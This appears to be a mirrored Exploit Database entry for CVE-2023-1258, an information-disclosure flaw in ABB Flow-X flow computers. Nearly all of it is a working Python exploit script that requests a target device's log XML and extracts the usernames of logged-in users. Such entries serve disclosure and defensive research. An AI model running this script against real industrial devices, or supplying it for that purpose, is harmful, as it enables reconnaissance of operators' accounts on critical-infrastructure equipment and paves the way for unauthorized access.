ABB FlowX v4.00 – Exposure of Sensitive Information

• Exploit Database
• 133 阅读

• 作者： Paul Smith
  日期： 2023-07-19
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51603/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258     #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests   # Set the request parameter url = sys.argv[1]     def dump_users(): response = requests.get(url)   # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) exit()   # Decode the xml response into dictionary and use the data data = response.text soup = BS(data, features="xml") logs = soup.find_all("log") for log in logs: test = re.search('User (.*?) logged in',str(log)) if test: print(test.group(0)) def main(): dump_users()     if __name__ == '__main__': main()